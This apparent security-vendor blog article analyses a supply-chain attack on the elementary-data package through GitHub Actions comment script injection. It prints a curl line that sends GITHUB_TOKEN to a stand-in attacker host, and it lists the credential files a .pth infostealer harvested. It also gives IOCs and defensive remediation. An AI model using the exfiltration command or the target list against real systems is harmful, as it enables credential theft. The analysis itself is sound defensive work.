What is Lyrie Research?

Lyrie Research is an autonomous cybersecurity intelligence platform publishing verified threat intelligence including critical CVEs, active exploitation reports, breach analysis, and original research — every article cross-validated by 3+ primary sources.

How does Lyrie.ai protect against rogue AI threats?

Lyrie.ai uses machine-speed autonomous defense to detect and neutralize rogue AI, prompt injection, and AI supply chain attacks. It responds before human analysts can react.

What cybersecurity topics does Lyrie Research cover?

Lyrie Research covers CVE deep dives, CISA KEV actively exploited vulnerabilities, data breach forensics, original cybersecurity research, and AI threat intelligence including agent-based attacks.

How often is Lyrie Research updated?

Lyrie Research is updated continuously by the autonomous Lyrie Sentinel engine, publishing new threat intelligence multiple times daily as new CVEs, exploits, and breaches are confirmed.

Is Lyrie Research free to access?

Yes, all articles on Lyrie Research are freely accessible. For active protection by the same intelligence engine, visit lyrie.ai.

The Comment That Poisoned a Million Pipelines: elementary-data's GitHub Actions Script Injection and the Rise of CI-Native Supply Chain Attacks

← Supply-Chain Deep-Dive

0 sources verified·10 min read

By Lyrie.ai Cyber Research Division·5/5/2026

TL;DR

On April 25, 2026, an attacker compromised elementary-data v0.23.3 — a Python package with over 1.1 million monthly downloads — without ever stealing a maintainer's credentials or bypassing MFA. Instead, they posted a crafted comment on a GitHub pull request, exploited a script injection flaw in the project's CI workflow, and walked away with a short-lived GITHUB_TOKEN with write scope. That token was enough to forge a signed release tag, trigger the project's own publish pipeline, and ship a backdoored package to PyPI and the GitHub Container Registry — all while everything looked like a normal, legitimate release. The payload: a Python .pth infostealer that executes silently on every interpreter startup, harvesting cloud credentials, SSH keys, Kubernetes secrets, CI tokens, developer .env files, and cryptocurrency wallet files from every machine that installed it. The attack illuminates a structural crisis: GitHub Actions is not just CI infrastructure anymore — it is the attack surface.

Background

elementary-data is an open-source data observability platform built around dbt (Data Build Tool). Data engineers use it to monitor pipeline health, catch schema drift, flag data quality anomalies, and maintain observability across large warehouses (Snowflake, BigQuery, Redshift). Because it sits at the nexus of cloud credentials, database access, and orchestration secrets, it is exactly the kind of tool a well-targeted attacker would choose. A single compromised install in a production data-engineering environment means access to the entire data infrastructure it touches.

The package pulls over 1.1 million downloads monthly on PyPI. It is used by hundreds of data-forward startups, analytics agencies, and enterprise data teams. Those teams typically run it inside automated pipelines — on CI/CD runners, in Docker containers, in scheduled orchestrator jobs — meaning the malicious .pth file would be silently executing across production-adjacent infrastructure without any human interaction after install.

The attack played out on a weekend — a deliberate operational choice. Threat actors routinely launch supply chain hits on Fridays and Saturdays, knowing that maintainer response times stretch to 12-48 hours. In this case, exposure ran for roughly six hours before a community member named crisperik spotted the anomaly and opened a GitHub issue. From first injection to public disclosure: 18 hours. From malicious package live to first community flag: six hours. From flag to patched release: roughly six more.

Technical Analysis

The Vulnerability: `pull_request_comment` + Unsanitised Shell Interpolation

The attack exploits a class of vulnerability that StepSecurity researchers call GitHub Actions script injection: a workflow event trigger (issue_comment or pull_request_review_comment) that reads user-controlled input — specifically, the body of a pull request comment — and interpolates it directly into a run: shell block using ${{ github.event.comment.body }} (or equivalent).

The critical property here is that ${{ ... }} expressions are substituted before the shell sees them. They are not sanitised as shell variables (which would be $VAR passed through the environment); they are string-substituted directly into the script source. An attacker controls the content of a PR comment. That means they control an arbitrary string that gets inlined into a bash script running in the context of the base repository — with full access to the workflow's environment variables, including the GITHUB_TOKEN.

The payload posted by the attacker was a carefully crafted comment body. When the workflow triggered and processed it, the injected shell fragment extracted the runner's ephemeral token:

# Injected payload (simplified representation)
$(curl -H "Authorization: token $GITHUB_TOKEN" \
       -d '{"ref":"main"}' \
       https://attacker-c2.example.com/collect)

The GITHUB_TOKEN is short-lived (scoped to the run), but in this case the token had write permissions to the repository: enough to push commits, force-push tags, and trigger further workflows.

Forging the Release

With the harvested token in hand, the attacker used the GitHub API to:

1. Inject a malicious elementary.pth file into the source tree via a direct commit to main.

2. Create and push a new signed git tag: v0.23.3.

3. The tag creation triggered the project's legitimate release.yml workflow — the one that builds and publishes to PyPI.

The release pipeline executed exactly as designed: it built the package from source (which now included the attacker's .pth file), signed it with the project's own certificates, and pushed it to PyPI as elementary-data==0.23.3. It also built and pushed a Docker image tagged :0.23.3 and :latest to the GitHub Container Registry (GHCR).

From a supply chain integrity perspective, this is the worst case: the malicious package was not a typosquatted fake. It was a legitimate, signed, certificate-backed release from the real project's own publishing infrastructure. Signature checks would not catch it. Package name checks would not catch it. The only fingerprint was the addition of an unexpected .pth file.

The Payload: `.pth` Files as Silent Persistent Execution

Python's .pth file mechanism is a decades-old feature designed to extend the module search path. Files with the .pth extension placed in a site-packages directory are processed automatically every time the Python interpreter starts — including in virtual environments, in Docker containers, in orchestrator workers, and in any other Python runtime that has the package installed.

Critically, .pth files do not require an explicit import. There is no import guard, no explicit invocation, no user interaction required. The infostealer activates silently at interpreter startup. In a data pipeline environment where Python workers are started and restarted continuously, every process launch is a credential extraction event.

The elementary.pth payload targeted:

| Category | Targets |

|---|---|

| Cloud Credentials | ~/.aws/credentials, GCP application_default_credentials.json, Azure CLI tokens |

| SSH | ~/.ssh/id_*, ~/.ssh/known_hosts, authorized_keys |

| Kubernetes | ~/.kube/config, in-cluster service account tokens |

| CI/CD Secrets | GITHUB_TOKEN, NPM_TOKEN, PYPI_TOKEN, TWILIO_, STRIPE_ env vars |

| Developer Tokens | .env files, shell history, ~/.netrc |

| Container | Docker Hub credentials, container registry auth |

| Crypto Wallets | Bitcoin, Litecoin, Dogecoin, Zcash, Dash, Monero (XMR), Ripple wallet files |

| System Recon | /etc/passwd, ~/.bash_history, ~/.zsh_history, /proc/self/environ |

The payload was designed for the exact environment elementary-data lives in: a machine that has cloud provider CLIs installed, Kubernetes contexts configured, multiple .env files from data pipeline configurations, and likely an NPM_TOKEN or PYPI_TOKEN for the team's own package publishing. One install — access to the entire stack.

The GHCR Extension

Because the release pipeline included a build-and-push-docker-image job, the malicious .pth file also landed in the official Docker image published to ghcr.io/elementary-data/elementary:0.23.3 and, critically, :latest. Organisations running elementary-data in containerised environments who pinned to :latest (a common pattern) automatically pulled and deployed the backdoored image. Container-based deployments often run with broader environment variable access than local installs — meaning the payload had access to orchestration-level secrets injected as container environment variables.

Indicators of Compromise (IOCs)

| Type | Value |

|---|---|

| Malicious PyPI package | elementary-data==0.23.3 |

| Malicious Docker image | ghcr.io/elementary-data/elementary:0.23.3 |

| Malicious Docker image | ghcr.io/elementary-data/elementary:latest (as of April 25–26, 2026 window) |

| Malicious file | elementary.pth in site-packages/ |

| Malicious git tag | v0.23.3 in elementary-data/elementary repo |

| Attack window | April 25, 2026 15:00 UTC → April 26, 2026 ~08:00 UTC |

| Clean replacement | elementary-data==0.23.4 |

Detection heuristics:

Presence of elementary.pth in any Python site-packages/ directory.
Unexpected outbound connections from Python worker processes to non-standard endpoints immediately after interpreter startup.
GITHUB_TOKEN or cloud credentials showing up in process memory dumps or runner logs for jobs that should not be touching them.
Docker image digests for elementary not matching post-patch checksums from the project's verified releases.

The Broader Pattern: GitHub Actions as the Primary Supply Chain Attack Surface

This attack is not an isolated incident. It is part of a structural pattern that has been building since 2024:

November 2024 — SpotBugs: pull_request_target trigger + untrusted fork checkout leaked a maintainer PAT.
December 2024 — Ultralytics: Same trigger family, cache poisoning second stage, crypto miner shipped to PyPI.
March 2025 — tj-actions/changed-files (CVE-2025-30066): The harvested PAT from SpotBugs, used months later to push a malicious commit to a transitive dependency of 23,000 repositories. CISA advisory issued.
April 2025 — nx packages: Malicious GitHub Actions workflow injected AI coding assistant credential harvester.
April 2026 — elementary-data: Script injection via PR comment, full release pipeline hijack, 1.1M-download package backdoored.
April–May 2026 — Mini Shai-Hulud (TeamPCP): GitHub Actions and npm tokens harvested from compromised machines used to self-propagate through developer release workflows, poisoning SAP npm packages and PyTorch Lightning.

Every one of these exploits GitHub Actions operating as documented. The pull_request_target trigger was designed for cross-fork workflows. Expression interpolation into run: blocks is how you pass PR metadata to shell scripts. GITHUB_TOKEN write permissions are the default for many workflows. The attack surface is not a collection of bugs — it is a collection of features assembled in ways their designers did not anticipate at scale.

ReversingLabs data puts malicious open-source package growth at 73% in 2026. GitHub Actions is the common thread running through the majority of the most impactful cases.

Lyrie Take

The elementary-data incident represents the maturation of what we at Lyrie call CI-native supply chain exploitation: attacks that do not compromise credentials, do not phish maintainers, and do not plant typosquatted packages. They compromise the build infrastructure itself, and then let the legitimate release pipeline do the work.

This is categorically harder to detect than traditional supply chain attacks because:

1. The package is signed by the real maintainer's infrastructure. Certificate validation passes. PyPI's signing checks pass. The package looks exactly like every other legitimate release.

2. The attack vector leaves minimal persistent evidence in the repository. The malicious .pth file was added in a single commit via API. Once the tag was cut and the release pipeline fired, the commit could theoretically have been cleaned from the tree — though in this case it was not.

3. The payload executes without import. Traditional static analysis of Python packages looks for suspicious imports, network calls, and subprocess executions in package __init__.py or setup.py hooks. A .pth file with a one-line exec() call is invisible to most scanners that don't specifically enumerate .pth file content.

For organisations in the data engineering space — anyone running dbt, Airflow, Prefect, Dagster, or similar — this attack is a template for future campaigns. The data pipeline tooling ecosystem is full of widely-trusted packages with CI/CD workflows that haven't been audited for script injection since they were written. Many of them have direct access to production warehouse credentials.

The fix for elementary-data was a patch released in six hours after discovery. Uninstalling the package does not remediate a compromise. Credential rotation is required for any machine that installed v0.23.3. For teams running the :latest Docker tag, the exposure window may be longer and harder to bound.

Defender Playbook

Immediate (If You Installed `elementary-data==0.23.3`)

1. Rotate all credentials on affected machines immediately — cloud provider IAM keys, Kubernetes service account tokens, Docker Hub credentials, CI/CD tokens, any .env file values that were accessible to the Python runtime.

2. Audit shell history and process logs for unexpected network connections from Python processes.

3. Purge all Python caches (~/.cache/pip, site-packages/) and reinstall from 0.23.4.

4. Pull new Docker images and verify digests against post-patch checksums.

5. Check GHCR image history for any deployments that pulled :latest in the April 25–26 window.

For Open-Source Maintainers

6. Audit all pull_request_target and issue_comment-triggered workflows for direct interpolation of ${{ github.event.*.body }} into run: blocks. Use $INPUT_VAR environment variable pattern instead:

   env:
     COMMENT_BODY: ${{ github.event.comment.body }}
   run: echo "$COMMENT_BODY"  # Not: echo "${{ github.event.comment.body }}"

7. Scope GITHUB_TOKEN to minimum required permissions. Use permissions: blocks in workflow files; default to read-only and escalate only where needed.

8. Require tag protection rules. Prevent arbitrary tag creation without a PR review or branch protection equivalent.

9. Pin third-party Actions to full commit SHAs, not mutable tags (uses: actions/checkout@v4 → uses: actions/checkout@<full-sha>).

10. Use StepSecurity Harden-Runner or equivalent to detect unexpected network egress from CI runners.

For Enterprise / Platform Security Teams

11. Implement package version pinning in requirements.txt and lock files for all production dependencies. Systems without pinned versions pulled the backdoored build automatically.

12. Deploy SCA tooling that specifically enumerates .pth files in installed packages as a detection heuristic.

13. Block ghcr.io/:latest consumption in production Kubernetes clusters; require specific digest pinning.

14. Monitor outbound connections from data pipeline orchestrators for anomalous patterns at process startup.

15. Establish a credential rotation runbook for supply chain incidents — organisations that were affected had no pre-existing playbook and lost hours to manual coordination.

Sources

1. StepSecurity — "elementary-data Compromised on PyPI and GHCR: Forged Release Pushed via GitHub Actions Script Injection" — stepsecurity.io, April 27, 2026

2. BleepingComputer — "PyPI package with 1.1M monthly downloads hacked to push infostealer" — bleepingcomputer.com, May 1, 2026

3. The CyberSec Guru — "Elementary-Data PyPI Hack: 1.1M Users Targeted by Infostealer" — thecybersecguru.com, April 30, 2026

4. Reddit r/cybersecurity — "Supply Chain Attack: GitHub Actions compromise led to malicious PyPI release of elementary-data" — April 28, 2026

5. Andrew Nesbitt — "GitHub Actions is the weakest link" — nesbitt.io, April 28, 2026

6. Wiz Blog — "Supply Chain Campaign Targets SAP npm Packages" (Mini Shai-Hulud context) — wiz.io, April 29, 2026

7. Security Boulevard — "1,800 Developers Hit in Mini Shai-Hulud Supply Chain Attack Across PyPI, NPM, and PHP" — May 3, 2026

8. ReversingLabs — Open-source malicious package growth statistics 2026

Lyrie.ai Cyber Research Division — Senior Analyst Desk

Lyrie Verdict

Lyrie's autonomous defense layer flags this class of exposure the moment it surfaces — no signature update required.

#supply-chain #github-actions #pypi #ci-cd #infostealer #script-injection #python #dbt

originals

Pattern alert: 17 recent advisories converge on misp-project-misp

1 min read · 5 sources